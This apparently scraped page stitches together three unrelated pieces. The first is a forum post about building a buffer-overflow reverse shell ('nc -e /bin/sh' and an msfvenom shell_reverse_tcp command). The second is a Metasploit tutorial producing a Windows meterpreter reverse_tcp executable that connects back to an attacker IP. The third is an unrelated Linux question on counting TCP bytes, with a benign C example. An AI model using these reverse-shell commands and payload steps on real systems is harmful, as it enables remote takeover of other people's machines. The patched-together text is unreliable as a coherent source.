Tcp payload on linux
Hi, I’ve been working on this problem for a while, and some advice would be appreciated.
Scenario: I’m trying to create a Linux reverse bind shell through a netcat connection to a specific IP and port number. The payload would be transmitted as text along with a NOP sled and overwritten return addresses, which will generate a buffer overflow in the target machine and execute the "nc -e /bin/sh ipaddr port#" command, which would spawn a shell on my side.
While I’ve gotten a good idea of how much space I have for the payload and what offsets the return addresses should be stored, I’m hopelessly lost on how to make the payload itself.
First I tried this site, which gave me a nice hex-format shellcode. But when I went to test it on my local machine as a final step, by having a terminal with nc running and executing the payload, it failed to generate a connection.
So next I tried using msfvenom to create a payload. I tried using a linux/shell_reverse_tcp payload with these settings to create a payload:
msfvenom -a x86 --platform linux -p linux/x86/shell_reverse_tcp -b '\x00' -f sh LHOST=127.127.127.127 LPORT=4444
But when I went to test that on my local machine, it also didn’t work.
I was hoping someone could tell me whether I was doing something wrong with msfvenom, or whether there are other, better payload-generating methods.
Update: I ended up using the asm code that was on the first site I linked above. By fiddling with the offsets after changing the IP and port number, I was able to generate reverse shells through a netcat connection using the resulting shellcode; the first time around I must have made several mistakes with the offsets.
Thanks to u/SirBaronBomboozie, u/CommoG33k and u/Sionion for helping me out with this problem!
How to Create Payload with Metasploit
Metasploit is one of the most widely used platforms for conducting penetration tests and hacking. To use its exploits effectively, we need to understand how exploits and payloads work together. In simple terms, a payload is the action that runs once an exploit has completed: it is the piece of code the exploit executes on the target. Exploits are used to gain access to a system, and payloads carry out specific tasks once that access exists. Metasploit has many payloads, such as reverse shells, bind shells, Meterpreter, and others. Several payloads work with most exploits; however, finding the right payload for a given exploit takes some investigation. Once you have decided on an exploit, use Metasploit’s “display payloads” command to list the payloads that work with it.
Types of payloads
In Metasploit, there are a few different sorts of payloads. These three basic types are the ones you will end up using the most:
Singles
Singles are extremely small payloads, intended to initiate a connection before moving on to another stage.
Stagers
The payload uses the stager to establish a network connection between the target system and the payload handler on the Metasploit server. The stager lets a small payload load and inject a larger, more complex payload, termed the stage.
Meterpreter
Meterpreter is a Metasploit attack payload that gives an intruder an interactive session from which to browse the target machine and execute code on it. Meterpreter runs in memory only and does not write to disk. It injects itself into the exploited process, from where it can migrate to other running processes; therefore, no new processes are created. Meterpreter was designed to avoid the disadvantages of specialized payloads while allowing scripted commands and ensuring encrypted communication. The downside of specific payloads is that alarms may be raised when a new process starts on the target system.
Creating payload with Metasploit in Kali Linux
To create payload with Metasploit in Kali Linux, follow all the steps described below:
Step 1: Accessing Msfconsole
msfconsole is the main means of accessing the majority of Metasploit’s functionality; it gives the framework a console-based interface. msfconsole is the MSF interface with the most features and is the most stable. Full readline support, tabbing, and command completion are all provided by msfconsole, and external commands can be run from within it. Use the following stated command to access msfconsole on Kali Linux.
Step 2: Accessing msfvenom
The payload we make using msfvenom will be a reverse TCP payload. This payload creates an executable that, when started, establishes a connection from the machine it runs on back to our Metasploit handler, allowing us to open a Meterpreter session. Use the following stated command to access msfvenom on Kali Linux.
Step 3: Creating payload
Use the following stated command to create a payload in Metasploit on Kali Linux.
$ msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.28 lport=6001 -f exe -o payload.exe
The -p option indicates which payload you want to use. lhost is the attacker’s IP address to which the payload will connect back. lport is the same idea for the port the payload will connect to, and it must match the port configured in the handler. -f tells msfvenom which output format to generate; in this case we want a Windows program executable, exe, and -o names the output file. The payload created by the above command is 73802 bytes, as shown in the image attached above.
To verify where it has been created, navigate to the home directory. The screenshot attached below shows that payload.exe has been created successfully.
You can check its properties by double-clicking on it. The size of the created payload is the same as was shown on the terminal.
Conclusion
This article has provided a brief introduction to payloads and their types, and has followed step-by-step instructions to create a payload with Metasploit on the Kali Linux operating system.
Determine TCP payload activity/statistics
I’d like to look up a counter of the TCP payload activity (total bytes received) either for a given file descriptor or a given interface. Preferably the given file descriptor, but the interface would be sufficient. Ideally I’d really like to know about any bytes that have been ack-ed, even ones which I have not read into userspace (yet?). I’ve seen the TCP_INFO feature of getsockopt(), but none of the fields appear to store "total bytes received" or "total bytes transmitted (acked, e.g.)" so far as I can tell. I’ve also seen the netlink IFLA_STATS + RTNL_TC_BYTES and the SIOCETHTOOL + ETHTOOL_GSTATS ioctl() (rx_bytes field) for the interfaces, and those are great, but I don’t think they’ll be able to discriminate between the overhead/headers of the other layers and the actual payload bytes. procfs has /proc/net/tcp, but this doesn’t seem to contain what I’m looking for either. Is there any way to get this particular data?

EDIT: promiscuous mode has an unbearable impact on throughput, so I can’t leverage anything that uses it. Not to mention that implementing large parts of the IP stack to determine which packets are appropriate is beyond my intended scope for this solution. The goal is to have an overarching/no-trust/second-guess of the values I store from recvmsg(). The Right Thing™ to do is to keep track of those values correctly, but it would be valuable to have a simple "Hey OS? How many bytes have I really received on this socket?"
Can you use libpcap? You can set up a monitor interface and capture exactly the types of packet you want, then just increment a counter when those packets meet your criteria.
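As an added example (not from the question or the answer above), the following C program asks the receiving socket's own kernel counter instead of capturing traffic: Linux 4.1 added tcpi_bytes_received and tcpi_bytes_acked to struct tcp_info, which is the "how many bytes have I really received on this socket?" value the question wants, counting payload only and including bytes not yet read into userspace. glibc's <netinet/tcp.h> copy of the struct predates those fields, so the kernel's <linux/tcp.h> is used; the loopback connection and the 'A' payload are constructed sample traffic, and the length check guards against an older kernel returning a shorter struct.

```c
#include <arpa/inet.h>
#include <linux/tcp.h>
#include <netinet/in.h>
#include <stddef.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

/* Kernel-side count of in-order payload bytes this TCP socket has received,
 * read by userspace or not; -1 on error or on a kernel (< 4.1) lacking it. */
long long tcp_bytes_received(int fd)
{
    struct tcp_info ti;
    socklen_t len = sizeof ti;
    size_t need = offsetof(struct tcp_info, tcpi_bytes_received) + sizeof ti.tcpi_bytes_received;
    if (getsockopt(fd, IPPROTO_TCP, TCP_INFO, &ti, &len) != 0 || len < need)
        return -1;
    return (long long)ti.tcpi_bytes_received;
}

/* Constructed sample traffic: one send() of n bytes (far below the loopback MSS, so one
 * segment) over 127.0.0.1, of which userspace reads back only half. Returns the kernel's
 * count for the accepted socket, which should already equal n; -1 on any socket failure. */
long long loopback_demo(size_t n)
{
    struct sockaddr_in a = { .sin_family = AF_INET };   /* port 0: kernel picks one */
    socklen_t alen = sizeof a; char buf[8192];
    size_t got = 0; long long result = -1; int ls, cs = -1, ss = -1;
    a.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    if (n > sizeof buf || (ls = socket(AF_INET, SOCK_STREAM, 0)) < 0)
        return -1;
    if (bind(ls, (struct sockaddr *)&a, sizeof a) || listen(ls, 1) ||
        getsockname(ls, (struct sockaddr *)&a, &alen) ||
        (cs = socket(AF_INET, SOCK_STREAM, 0)) < 0 ||
        connect(cs, (struct sockaddr *)&a, sizeof a) ||
        (ss = accept(ls, NULL, NULL)) < 0)
        goto out;
    memset(buf, 'A', n);
    if (send(cs, buf, n, 0) != (ssize_t)n)
        goto out;
    while (got < n / 2) {                        /* leave the other half unread */
        ssize_t r = recv(ss, buf, n / 2 - got, 0);
        if (r <= 0) goto out;
        got += (size_t)r;
    }
    result = tcp_bytes_received(ss);             /* counts the unread bytes too */
out:
    if (ss >= 0) close(ss);
    if (cs >= 0) close(cs);
    close(ls);
    return result;
}
```

The client side's tcpi_bytes_acked from the same getsockopt() call gives the matching "bytes transmitted and acked" figure, but on a live connection it lags until the peer's ACK arrives, so it is not asserted here.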